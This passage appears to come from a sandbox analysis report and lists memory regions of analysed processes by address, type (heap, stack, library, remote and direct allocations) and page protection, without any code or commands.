|
page read and write
|
||
|
1C353FE1000
|
heap
|
page read and write
|
||
|
9A3E000
|
heap
|
page read and write
|
||
|
81B6000
|
heap
|
page read and write
|
||
|
72F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0090000
|
trusted library allocation
|
page read and write
|
||
|
28B0000
|
heap
|
page readonly
|
||
|
1B5D2A9A000
|
heap
|
page read and write
|
||
|
1B5D4490000
|
trusted library allocation
|
page read and write
|
||
|
1C353FCF000
|
heap
|
page read and write
|
||
|
2885000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C354122000
|
heap
|
page read and write
|
||
|
1C353F72000
|
heap
|
page read and write
|
||
|
6E40000
|
heap
|
page read and write
|
||
|
7FF7C0030000
|
trusted library allocation
|
page read and write
|
||
|
5DB670B000
|
stack
|
page read and write
|
||
|
24C10000
|
direct allocation
|
page read and write
|
||
|
73BB000
|
stack
|
page read and write
|
||
|
7B0000
|
trusted library section
|
page read and write
|
||
|
252FB000
|
stack
|
page read and write
|
||
|
1C352045000
|
heap
|
page read and write
|
||
|
1B5ECF40000
|
heap
|
page read and write
|
||
|
5DB59BC000
|
stack
|
page read and write
|
||
|
5DB55FC000
|
stack
|
page read and write
|
||
|
1C352180000
|
heap
|
page read and write
|
||
|
8340000
|
trusted library allocation
|
page read and write
|
||
|
1C35400F000
|
heap
|
page read and write
|
||
|
257CB000
|
heap
|
page read and write
|
||
|
7036AFE000
|
stack
|
page read and write
|
||
|
1C35406C000
|
heap
|
page read and write
|
||
|
466E000
|
stack
|
page read and write
|
||
|
8360000
|
trusted library allocation
|
page read and write
|
||
|
6E70000
|
heap
|
page read and write
|
||
|
1C354055000
|
heap
|
page read and write
|
||
|
9A4D000
|
heap
|
page read and write
|
||
|
1C3520A2000
|
heap
|
page read and write
|
||
|
2850000
|
trusted library allocation
|
page read and write
|
||
|
1B5ECD63000
|
heap
|
page read and write
|
||
|
7060000
|
heap
|
page execute and read and write
|
||
|
1B5E4901000
|
trusted library allocation
|
page read and write
|
||
|
1B5D4611000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFF02000
|
trusted library allocation
|
page read and write
|
||
|
2870000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFD3B000
|
trusted library allocation
|
page read and write
|
||
|
1C352094000
|
heap
|
page read and write
|
||
|
2E8F000
|
heap
|
page read and write
|
||
|
7FF7BFFD0000
|
trusted library allocation
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
1B5ECD45000
|
heap
|
page read and write
|
||
|
1B5D5C54000
|
trusted library allocation
|
page read and write
|
||
|
24C90000
|
direct allocation
|
page read and write
|
||
|
1C353FB9000
|
heap
|
page read and write
|
||
|
7DB0000
|
heap
|
page read and write
|
||
|
6DBF000
|
stack
|
page read and write
|
||
|
1C3520A2000
|
heap
|
page read and write
|
||
|
1B5D2AD4000
|
heap
|
page read and write
|
||
|
8130000
|
heap
|
page read and write
|
||
|
2BCF000
|
stack
|
page read and write
|
||
|
7036DFF000
|
stack
|
page read and write
|
||
|
9A80000
|
heap
|
page read and write
|
||
|
1C353FE1000
|
heap
|
page read and write
|
||
|
287A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C354075000
|
heap
|
page read and write
|
||
|
9127000
|
remote allocation
|
page execute and read and write
|
||
|
9AE0000
|
heap
|
page read and write
|
||
|
811C000
|
stack
|
page read and write
|
||
|
1C353F92000
|
heap
|
page read and write
|
||
|
1C353F6D000
|
heap
|
page read and write
|
||
|
29AC000
|
stack
|
page read and write
|
||
|
7070000
|
trusted library allocation
|
page read and write
|
||
|
1C353F87000
|
heap
|
page read and write
|
||
|
1C352086000
|
heap
|
page read and write
|
||
|
1C353FE1000
|
heap
|
page read and write
|
||
|
7E5E000
|
stack
|
page read and write
|
||
|
6B50000
|
direct allocation
|
page read and write
|
||
|
2527F000
|
stack
|
page read and write
|
||
|
1C354120000
|
heap
|
page read and write
|
||
|
7FF7C0060000
|
trusted library allocation
|
page read and write
|
||
|
7FE5000
|
trusted library allocation
|
page read and write
|
||
|
4060000
|
remote allocation
|
page execute and read and write
|
||
|
7E9B000
|
trusted library allocation
|
page read and write
|
||
|
8156000
|
heap
|
page read and write
|
||
|
6F93000
|
heap
|
page read and write
|
||
|
1C352072000
|
heap
|
page read and write
|
||
|
9A4F000
|
heap
|
page read and write
|
||
|
1B5D4605000
|
heap
|
page read and write
|
||
|
7FF7BFFE0000
|
trusted library allocation
|
page read and write
|
||
|
1B5EC61C000
|
heap
|
page read and write
|
||
|
72E0000
|
trusted library allocation
|
page read and write
|
||
|
285D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B5ECAB0000
|
heap
|
page read and write
|
||
|
1B5D2C95000
|
heap
|
page read and write
|
||
|
1C353F72000
|
heap
|
page read and write
|
||
|
5BE000
|
stack
|
page read and write
|
||
|
1C35403C000
|
heap
|
page read and write
|
||
|
7FF7BFF50000
|
trusted library allocation
|
page read and write
|
||
|
1B5ECD53000
|
heap
|
page read and write
|
||
|
1C353AB6000
|
heap
|
page read and write
|
||
|
1B5D2A50000
|
heap
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
25030000
|
heap
|
page read and write
|
||
|
B4E0000
|
direct allocation
|
page read and write
|
||
|
1C3540A1000
|
heap
|
page read and write
|
||
|
1B5ECBF0000
|
heap
|
page read and write
|
||
|
1C3540F3000
|
heap
|
page read and write
|
||
|
5C4000
|
heap
|
page read and write
|
||
|
1B5D4835000
|
trusted library allocation
|
page read and write
|
||
|
1C35204F000
|
heap
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
B43B000
|
unclassified section
|
page execute and read and write
|
||
|
9A4D000
|
heap
|
page read and write
|
||
|
1C353F50000
|
heap
|
page read and write
|
||
|
5DB5B3F000
|
stack
|
page read and write
|
||
|
290E000
|
stack
|
page read and write
|
||
|
6B90000
|
direct allocation
|
page read and write
|
||
|
2854000
|
trusted library allocation
|
page read and write
|
||
|
71EE000
|
stack
|
page read and write
|
||
|
1C352071000
|
heap
|
page read and write
|
||
|
9A33000
|
heap
|
page read and write
|
||
|
6FA3000
|
heap
|
page read and write
|
||
|
1C353ABC000
|
heap
|
page read and write
|
||
|
1C35205A000
|
heap
|
page read and write
|
||
|
1B5ECDDF000
|
heap
|
page read and write
|
||
|
7FF7BFF90000
|
trusted library allocation
|
page read and write
|
||
|
1C354061000
|
heap
|
page read and write
|
||
|
1C353FB9000
|
heap
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
9A83000
|
heap
|
page read and write
|
||
|
6AE0000
|
direct allocation
|
page read and write
|
||
|
2853000
|
trusted library allocation
|
page execute and read and write
|
||
|
5DB583E000
|
stack
|
page read and write
|
||
|
252BD000
|
stack
|
page read and write
|
||
|
1B5D2C60000
|
heap
|
page read and write
|
||
|
1C353FCF000
|
heap
|
page read and write
|
||
|
1C353FE1000
|
heap
|
page read and write
|
||
|
1B5D649B000
|
trusted library allocation
|
page read and write
|
||
|
5DB51FD000
|
stack
|
page read and write
|
||
|
7D47000
|
stack
|
page read and write
|
||
|
4780000
|
heap
|
page execute and read and write
|
||
|
1C353F51000
|
heap
|
page read and write
|
||
|
1C354069000
|
heap
|
page read and write
|
||
|
28CB000
|
heap
|
page read and write
|
||
|
1C353AC2000
|
heap
|
page read and write
|
||
|
1C353F6E000
|
heap
|
page read and write
|
||
|
5DB577E000
|
stack
|
page read and write
|
||
|
2523E000
|
stack
|
page read and write
|
||
|
1B5ECDC4000
|
heap
|
page read and write
|
||
|
2540E000
|
stack
|
page read and write
|
||
|
8189000
|
heap
|
page read and write
|
||
|
1C353FD3000
|
heap
|
page read and write
|
||
|
7FF7BFDDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C0010000
|
trusted library allocation
|
page read and write
|
||
|
1B5E4631000
|
trusted library allocation
|
page read and write
|
||
|
8727000
|
remote allocation
|
page execute and read and write
|
||
|
6C0E000
|
stack
|
page read and write
|
||
|
47F2000
|
trusted library allocation
|
page read and write
|
||
|
6DF000
|
stack
|
page read and write
|
||
|
1C353FE1000
|
heap
|
page read and write
|
||
|
1C353F7D000
|
heap
|
page read and write
|
||
|
7327000
|
remote allocation
|
page execute and read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
70368F9000
|
stack
|
page read and write
|
||
|
255D8000
|
heap
|
page read and write
|
||
|
818D000
|
heap
|
page read and write
|
||
|
2E6E000
|
heap
|
page read and write
|
||
|
8080000
|
heap
|
page read and write
|
||
|
9A3E000
|
heap
|
page read and write
|
||
|
6CCB000
|
stack
|
page read and write
|
||
|
1C354050000
|
heap
|
page read and write
|
||
|
1C354061000
|
heap
|
page read and write
|
||
|
4127000
|
remote allocation
|
page execute and read and write
|
||
|
1B5D2ABA000
|
heap
|
page read and write
|
||
|
5527000
|
remote allocation
|
page execute and read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
7036FFC000
|
stack
|
page read and write
|
||
|
1B5D51A1000
|
trusted library allocation
|
page read and write
|
||
|
6DFE000
|
stack
|
page read and write
|
||
|
1B5D4450000
|
trusted library allocation
|
page read and write
|
||
|
57B9000
|
trusted library allocation
|
page read and write
|
||
|
1C35204F000
|
heap
|
page read and write
|
||
|
1C353FE1000
|
heap
|
page read and write
|
||
|
803C000
|
stack
|
page read and write
|
||
|
1C352094000
|
heap
|
page read and write
|
||
|
1B5E4611000
|
trusted library allocation
|
page read and write
|
||
|
28C0000
|
heap
|
page read and write
|
||
|
1B5ECDAD000
|
heap
|
page read and write
|
||
|
2DCE000
|
stack
|
page read and write
|
||
|
1C351FB0000
|
heap
|
page read and write
|
||
|
9A4D000
|
heap
|
page read and write
|
||
|
255D9000
|
heap
|
page read and write
|
||
|
24C40000
|
direct allocation
|
page read and write
|
||
|
72C0000
|
trusted library allocation
|
page read and write
|
||
|
1C3520A2000
|
heap
|
page read and write
|
||
|
7048000
|
trusted library allocation
|
page read and write
|
||
|
1C351FDA000
|
heap
|
page read and write
|
||
|
9A59000
|
heap
|
page read and write
|
||
|
7FF7BFF30000
|
trusted library allocation
|
page read and write
|
||
|
1C35209D000
|
heap
|
page read and write
|
||
|
1C353FD5000
|
heap
|
page read and write
|
||
|
25561000
|
heap
|
page read and write
|
||
|
9A3E000
|
heap
|
page read and write
|
||
|
1C352094000
|
heap
|
page read and write
|
||
|
7300000
|
trusted library allocation
|
page read and write
|
||
|
24C70000
|
direct allocation
|
page read and write
|
||
|
7E1D000
|
stack
|
page read and write
|
||
|
45D5000
|
heap
|
page execute and read and write
|
||
|
7360000
|
trusted library allocation
|
page read and write
|
||
|
255D8000
|
heap
|
page read and write
|
||
|
24C20000
|
direct allocation
|
page read and write
|
||
|
1B5D4507000
|
heap
|
page execute and read and write
|
||
|
1C35204F000
|
heap
|
page read and write
|
||
|
2554E000
|
stack
|
page read and write
|
||
|
1C353FD0000
|
heap
|
page read and write
|
||
|
1C35406D000
|
heap
|
page read and write
|
||
|
253CD000
|
stack
|
page read and write
|
||
|
9AF0000
|
heap
|
page readonly
|
||
|
1B5ECDBE000
|
heap
|
page read and write
|
||
|
B4D0000
|
direct allocation
|
page read and write
|
||
|
7FF7BFEC0000
|
trusted library allocation
|
page read and write
|
||
|
6B00000
|
direct allocation
|
page read and write
|
||
|
1C3540A0000
|
heap
|
page read and write
|
||
|
1C353F71000
|
heap
|
page read and write
|
||
|
7FF7BFF07000
|
trusted library allocation
|
page read and write
|
||
|
6C8D000
|
stack
|
page read and write
|
||
|
9A5B000
|
heap
|
page read and write
|
||
|
1C353FCF000
|
heap
|
page read and write
|
||
|
7FF7BFFB0000
|
trusted library allocation
|
page read and write
|
||
|
57FE000
|
trusted library allocation
|
page read and write
|
||
|
1C352094000
|
heap
|
page read and write
|
||
|
1B5D2A70000
|
heap
|
page read and write
|
||
|
7FF7BFD22000
|
trusted library allocation
|
page read and write
|
||
|
9A42000
|
heap
|
page read and write
|
||
|
24C60000
|
direct allocation
|
page read and write
|
||
|
1B5D6026000
|
trusted library allocation
|
page read and write
|
||
|
80DD000
|
stack
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C00B0000
|
trusted library allocation
|
page read and write
|
||
|
24CB0000
|
direct allocation
|
page read and write
|
||
|
25460000
|
unclassified section
|
page execute and read and write
|
||
|
2510E000
|
stack
|
page read and write
|
||
|
1B5D2A20000
|
heap
|
page read and write
|
||
|
1C352048000
|
heap
|
page read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
1B5D4F9C000
|
trusted library allocation
|
page read and write
|
||
|
1C3540A0000
|
heap
|
page read and write
|
||
|
1B5D2B02000
|
heap
|
page read and write
|
||
|
9A5B000
|
heap
|
page read and write
|
||
|
1C353AC2000
|
heap
|
page read and write
|
||
|
1B5ECB2F000
|
heap
|
page read and write
|
||
|
1C353AC2000
|
heap
|
page read and write
|
||
|
1C352085000
|
heap
|
page read and write
|
||
|
25560000
|
heap
|
page read and write
|
||
|
1C353F89000
|
heap
|
page read and write
|
||
|
24C80000
|
direct allocation
|
page read and write
|
||
|
807C000
|
stack
|
page read and write
|
||
|
7FF7BFFF0000
|
trusted library allocation
|
page read and write
|
||
|
1C353FB9000
|
heap
|
page read and write
|
||
|
1C353FE1000
|
heap
|
page read and write
|
||
|
8430000
|
direct allocation
|
page read and write
|
||
|
1C351F80000
|
heap
|
page read and write
|
||
|
9DDB000
|
unclassified section
|
page execute and read and write
|
||
|
1C35408B000
|
heap
|
page read and write
|
||
|
9A4D000
|
heap
|
page read and write
|
||
|
7FF7C0000000
|
trusted library allocation
|
page read and write
|
||
|
25910000
|
heap
|
page read and write
|
||
|
25928000
|
heap
|
page read and write
|
||
|
250CF000
|
stack
|
page read and write
|
||
|
7FF7C0050000
|
trusted library allocation
|
page read and write
|
||
|
1C352085000
|
heap
|
page read and write
|
||
|
1C352075000
|
heap
|
page read and write
|
||
|
4791000
|
trusted library allocation
|
page read and write
|
||
|
4B27000
|
remote allocation
|
page execute and read and write
|
||
|
7D70000
|
trusted library allocation
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
72B0000
|
trusted library allocation
|
page read and write
|
||
|
5DB5938000
|
stack
|
page read and write
|
||
|
7FF7C0040000
|
trusted library allocation
|
page read and write
|
||
|
1B5D51B4000
|
trusted library allocation
|
page read and write
|
||
|
1B5D4A8C000
|
trusted library allocation
|
page read and write
|
||
|
24C00000
|
direct allocation
|
page read and write
|
||
|
4628000
|
heap
|
page read and write
|
||
|
7FF7BFED1000
|
trusted library allocation
|
page read and write
|
||
|
1C3520A2000
|
heap
|
page read and write
|
||
|
1C353F98000
|
heap
|
page read and write
|
||
|
1C352070000
|
heap
|
page read and write
|
||
|
6E60000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
1B5D2AB8000
|
heap
|
page read and write
|
||
|
1C353AB5000
|
heap
|
page read and write
|
||
|
1C353FB9000
|
heap
|
page read and write
|
||
|
1C351FD9000
|
heap
|
page read and write
|
||
|
592A000
|
trusted library allocation
|
page read and write
|
||
|
6F40000
|
heap
|
page read and write
|
||
|
BDD7000
|
direct allocation
|
page execute and read and write
|
||
|
95D7000
|
direct allocation
|
page execute and read and write
|
||
|
1C353FCF000
|
heap
|
page read and write
|
||
|
1C352086000
|
heap
|
page read and write
|
||
|
461E000
|
stack
|
page read and write
|
||
|
1B5D45B0000
|
heap
|
page read and write
|
||
|
7FF7BFDE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
75D000
|
stack
|
page read and write
|
||
|
7FF7BFFA0000
|
trusted library allocation
|
page read and write
|
||
|
452E000
|
stack
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
1B5D4D0B000
|
trusted library allocation
|
page read and write
|
||
|
7080000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C3540A0000
|
heap
|
page read and write
|
||
|
6C4D000
|
stack
|
page read and write
|
||
|
5DB5BBE000
|
stack
|
page read and write
|
||
|
70370FF000
|
stack
|
page read and write
|
||
|
1B5D2C90000
|
heap
|
page read and write
|
||
|
1C3520A2000
|
heap
|
page read and write
|
||
|
7FF7BFD23000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7BFF20000
|
trusted library allocation
|
page read and write
|
||
|
1C353FD5000
|
heap
|
page read and write
|
||
|
1C352026000
|
heap
|
page read and write
|
||
|
1B5ECCD0000
|
heap
|
page execute and read and write
|
||
|
B3D7000
|
direct allocation
|
page execute and read and write
|
||
|
6AD0000
|
direct allocation
|
page read and write
|
||
|
1C353F89000
|
heap
|
page read and write
|
||
|
2EDB000
|
heap
|
page read and write
|
||
|
1C352072000
|
heap
|
page read and write
|
||
|
9DF0000
|
heap
|
page read and write
|
||
|
7FF7BFF70000
|
trusted library allocation
|
page read and write
|
||
|
8330000
|
trusted library allocation
|
page read and write
|
||
|
2508E000
|
stack
|
page read and write
|
||
|
294E000
|
stack
|
page read and write
|
||
|
1B5D2B6A000
|
heap
|
page read and write
|
||
|
1C352094000
|
heap
|
page read and write
|
||
|
99CA000
|
heap
|
page read and write
|
||
|
1C35200C000
|
heap
|
page read and write
|
||
|
7FF7BFD2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C352082000
|
heap
|
page read and write
|
||
|
5DB660E000
|
stack
|
page read and write
|
||
|
9A4D000
|
heap
|
page read and write
|
||
|
9DC0000
|
unclassified section
|
page execute and read and write
|
||
|
1C354051000
|
heap
|
page read and write
|
||
|
5C8000
|
heap
|
page read and write
|
||
|
1B5D4C59000
|
trusted library allocation
|
page read and write
|
||
|
7040000
|
trusted library allocation
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
1B5ECD9A000
|
heap
|
page read and write
|
||
|
9A4A000
|
heap
|
page read and write
|
||
|
2E14000
|
heap
|
page read and write
|
||
|
1C353F88000
|
heap
|
page read and write
|
||
|
4BC000
|
stack
|
page read and write
|
||
|
70369FE000
|
stack
|
page read and write
|
||
|
2869000
|
trusted library allocation
|
page read and write
|
||
|
5DB5173000
|
stack
|
page read and write
|
||
|
1B5D639D000
|
trusted library allocation
|
page read and write
|
||
|
7D27000
|
remote allocation
|
page execute and read and write
|
||
|
8420000
|
direct allocation
|
page read and write
|
||
|
8410000
|
trusted library allocation
|
page execute and read and write
|
||
|
5DB557E000
|
stack
|
page read and write
|
||
|
7FF0000
|
trusted library allocation
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B5D44C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFE06000
|
trusted library allocation
|
page execute and read and write
|
||
|
72AD000
|
stack
|
page read and write
|
||
|
1B5ECD69000
|
heap
|
page read and write
|
||
|
1C354054000
|
heap
|
page read and write
|
||
|
8142000
|
heap
|
page read and write
|
||
|
1C352046000
|
heap
|
page read and write
|
||
|
7FF7BFD20000
|
trusted library allocation
|
page read and write
|
||
|
7FF7BFF80000
|
trusted library allocation
|
page read and write
|
||
|
1B5ECD00000
|
heap
|
page read and write
|
||
|
1C352000000
|
heap
|
page read and write
|
||
|
1C353C00000
|
heap
|
page read and write
|
||
|
2518D000
|
stack
|
page read and write
|
||
|
9A3E000
|
heap
|
page read and write
|
||
|
7F550000
|
trusted library allocation
|
page execute and read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
5DB547E000
|
stack
|
page read and write
|
||
|
9A3E000
|
heap
|
page read and write
|
||
|
6F7E000
|
heap
|
page read and write
|
||
|
1B5ECA6B000
|
heap
|
page read and write
|
||
|
1C353F7D000
|
heap
|
page read and write
|
||
|
1B5D657E000
|
trusted library allocation
|
page read and write
|
||
|
9B35000
|
heap
|
page read and write
|
||
|
1B5D4607000
|
heap
|
page read and write
|
||
|
816C000
|
heap
|
page read and write
|
||
|
2830000
|
trusted library section
|
page read and write
|
||
|
1B5D518F000
|
trusted library allocation
|
page read and write
|
||
|
1B5E4620000
|
trusted library allocation
|
page read and write
|
||
|
1C353FCF000
|
heap
|
page read and write
|
||
|
2882000
|
trusted library allocation
|
page read and write
|
||
|
1C353BE0000
|
remote allocation
|
page read and write
|
||
|
1B5ECB36000
|
heap
|
page read and write
|
||
|
1C353F8D000
|
heap
|
page read and write
|
||
|
24C30000
|
direct allocation
|
page read and write
|
||
|
1C351FE0000
|
heap
|
page read and write
|
||
|
8191000
|
heap
|
page read and write
|
||
|
477B000
|
stack
|
page read and write
|
||
|
4F9000
|
stack
|
page read and write
|
||
|
5DB567F000
|
stack
|
page read and write
|
||
|
1B5D63A1000
|
trusted library allocation
|
page read and write
|
||
|
760000
|
heap
|
page read and write
|
||
|
2E21000
|
heap
|
page read and write
|
||
|
7FF7BFEE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7BFD30000
|
trusted library allocation
|
page read and write
|
||
|
25753000
|
heap
|
page read and write
|
||
|
6AF0000
|
direct allocation
|
page read and write
|
||
|
1C353AB0000
|
heap
|
page read and write
|
||
|
6B30000
|
direct allocation
|
page read and write
|
||
|
8B10000
|
direct allocation
|
page execute and read and write
|
||
|
45D0000
|
heap
|
page execute and read and write
|
||
|
1C353F72000
|
heap
|
page read and write
|
||
|
1B5D2AFC000
|
heap
|
page read and write
|
||
|
2547B000
|
unclassified section
|
page execute and read and write
|
||
|
1C352037000
|
heap
|
page read and write
|
||
|
8181000
|
heap
|
page read and write
|
||
|
1C351FDF000
|
heap
|
page read and write
|
||
|
25661000
|
heap
|
page read and write
|
||
|
1C353F51000
|
heap
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
1C353FB9000
|
heap
|
page read and write
|
||
|
1C354127000
|
heap
|
page read and write
|
||
|
1B5D4600000
|
heap
|
page read and write
|
||
|
1C352029000
|
heap
|
page read and write
|
||
|
2585C000
|
heap
|
page read and write
|
||
|
2DEB000
|
heap
|
page read and write
|
||
|
29C0000
|
heap
|
page read and write
|
||
|
1C352000000
|
heap
|
page read and write
|
||
|
2544F000
|
stack
|
page read and write
|
||
|
1C353F89000
|
heap
|
page read and write
|
||
|
1C353FE1000
|
heap
|
page read and write
|
||
|
473D000
|
stack
|
page read and write
|
||
|
7FF7BFD24000
|
trusted library allocation
|
page read and write
|
||
|
9B30000
|
heap
|
page read and write
|
||
|
5F27000
|
remote allocation
|
page execute and read and write
|
||
|
1B5D2AB3000
|
heap
|
page read and write
|
||
|
1C353F7B000
|
heap
|
page read and write
|
||
|
5DB5C3B000
|
stack
|
page read and write
|
||
|
1C3520A2000
|
heap
|
page read and write
|
||
|
DBD7000
|
direct allocation
|
page execute and read and write
|
||
|
1C351FB9000
|
heap
|
page read and write
|
||
|
1C353FF4000
|
heap
|
page read and write
|
||
|
2550D000
|
stack
|
page read and write
|
||
|
456E000
|
stack
|
page read and write
|
||
|
1C353AB3000
|
heap
|
page read and write
|
||
|
8350000
|
trusted library allocation
|
page read and write
|
||
|
1B5D4694000
|
trusted library allocation
|
page read and write
|
||
|
1C35205E000
|
heap
|
page read and write
|
||
|
7DC0000
|
trusted library allocation
|
page read and write
|
||
|
71D000
|
stack
|
page read and write
|
||
|
7DF4E9500000
|
trusted library allocation
|
page execute and read and write
|
||
|
5DB58B6000
|
stack
|
page read and write
|
||
|
6B40000
|
direct allocation
|
page read and write
|
||
|
1C3540CE000
|
heap
|
page read and write
|
||
|
7FF7BFEF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
A9D7000
|
direct allocation
|
page execute and read and write
|
||
|
2860000
|
trusted library allocation
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C352072000
|
heap
|
page read and write
|
||
|
1B5D4480000
|
heap
|
page readonly
|
||
|
6B10000
|
direct allocation
|
page read and write
|
||
|
1B5ECDD0000
|
heap
|
page read and write
|
||
|
7FF7BFF05000
|
trusted library allocation
|
page read and write
|
||
|
1B5D6052000
|
trusted library allocation
|
page read and write
|
||
|
5DB57F9000
|
stack
|
page read and write
|
||
|
1C352072000
|
heap
|
page read and write
|
||
|
24CA0000
|
direct allocation
|
page read and write
|
||
|
1C35204F000
|
heap
|
page read and write
|
||
|
1C352080000
|
heap
|
page read and write
|
||
|
7310000
|
trusted library allocation
|
page read and write
|
||
|
4FD000
|
stack
|
page read and write
|
||
|
2591E000
|
heap
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
700D000
|
heap
|
page read and write
|
||
|
255D9000
|
heap
|
page read and write
|
||
|
25660000
|
heap
|
page read and write
|
||
|
1C352094000
|
heap
|
page read and write
|
||
|
2586D000
|
heap
|
page read and write
|
||
|
1C353F77000
|
heap
|
page read and write
|
||
|
28A0000
|
trusted library allocation
|
page read and write
|
||
|
24C50000
|
direct allocation
|
page read and write
|
||
|
4620000
|
heap
|
page read and write
|
||
|
7FF7BFDD6000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0020000
|
trusted library allocation
|
page read and write
|
||
|
29D0000
|
trusted library allocation
|
page read and write
|
||
|
1B5D4520000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0070000
|
trusted library allocation
|
page read and write
|
||
|
1C353FCF000
|
heap
|
page read and write
|
||
|
1C353BE0000
|
remote allocation
|
page read and write
|
||
|
5DB668D000
|
stack
|
page read and write
|
||
|
1B5E4910000
|
trusted library allocation
|
page read and write
|
||
|
2958000
|
trusted library allocation
|
page read and write
|
||
|
1C354068000
|
heap
|
page read and write
|
||
|
1C354123000
|
heap
|
page read and write
|
||
|
46AE000
|
stack
|
page read and write
|
||
|
1B5D4510000
|
heap
|
page execute and read and write
|
||
|
2514E000
|
stack
|
page read and write
|
||
|
7FF7BFF60000
|
trusted library allocation
|
page read and write
|
||
|
1C353FED000
|
heap
|
page read and write
|
||
|
2538C000
|
stack
|
page read and write
|
||
|
701E000
|
heap
|
page read and write
|
||
|
7FF7BFE40000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C3520A2000
|
heap
|
page read and write
|
||
|
1B5D5BBF000
|
trusted library allocation
|
page read and write
|
||
|
70B1000
|
heap
|
page read and write
|
||
|
1C35205E000
|
heap
|
page read and write
|
||
|
72D0000
|
trusted library allocation
|
page read and write
|
||
|
5DB56FE000
|
stack
|
page read and write
|
||
|
1B5D2AC2000
|
heap
|
page read and write
|
||
|
81C0000
|
heap
|
page read and write
|
||
|
9B00000
|
heap
|
page read and write
|
||
|
1B5D51BF000
|
trusted library allocation
|
page read and write
|
||
|
1B5ECDA5000
|
heap
|
page read and write
|
||
|
83ED000
|
stack
|
page read and write
|
||
|
6B20000
|
direct allocation
|
page read and write
|
||
|
7FF7BFF40000
|
trusted library allocation
|
page read and write
|
||
|
6B60000
|
direct allocation
|
page read and write
|
||
|
C7D7000
|
direct allocation
|
page execute and read and write
|
||
|
8120000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C3520A2000
|
heap
|
page read and write
|
||
|
1C3522F5000
|
heap
|
page read and write
|
||
|
48E7000
|
trusted library allocation
|
page read and write
|
||
|
70372FB000
|
stack
|
page read and write
|
||
|
1C35209C000
|
heap
|
page read and write
|
||
|
1B5D63B8000
|
trusted library allocation
|
page read and write
|
||
|
45AE000
|
stack
|
page read and write
|
||
|
1C353ABC000
|
heap
|
page read and write
|
||
|
1C352072000
|
heap
|
page read and write
|
||
|
5DB5ABE000
|
stack
|
page read and write
|
||
|
726E000
|
stack
|
page read and write
|
||
|
1C353FB9000
|
heap
|
page read and write
|
||
|
1B5D2AFE000
|
heap
|
page read and write
|
||
|
7036CFF000
|
stack
|
page read and write
|
||
|
1C35407A000
|
heap
|
page read and write
|
There are 579 hidden memdumps, click here to show them.